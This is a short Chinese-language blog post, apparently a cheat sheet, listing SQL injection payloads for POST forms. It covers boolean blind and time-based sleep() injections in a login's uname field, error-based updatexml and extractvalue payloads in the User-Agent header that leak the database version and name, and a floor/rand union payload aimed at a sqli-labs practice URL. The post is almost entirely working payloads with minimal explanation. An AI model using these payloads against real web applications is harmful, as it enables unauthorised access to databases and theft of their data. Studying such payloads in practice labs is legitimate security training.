0
点赞
收藏
分享

微信扫一扫

sql注入(POST盲注)

红色为payload

1.布尔型盲注(select语句盲注)

uname=xxxxxx' or (length(database())=8)--+&passwd=xxxxx&submit=Submit

2.时间盲注(select语句盲注)

uname=xxxxx' or (select if(length(database())>1,sleep(3),1))--+&passwd=xxxxx&submit=Submit

这里面sleep3秒后面的1代表真。

3.报错盲注(insert语句盲注)

xpath报错盲注

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1

extractvalue 用法

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0' or extractvalue(1,concat(0x7e,database())) or '1'='1

floor报错

​​http://192.168.1.63/sqli-labs/Less-5/?id=​​ 0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x) qkill --+




举报

相关推荐

0 条评论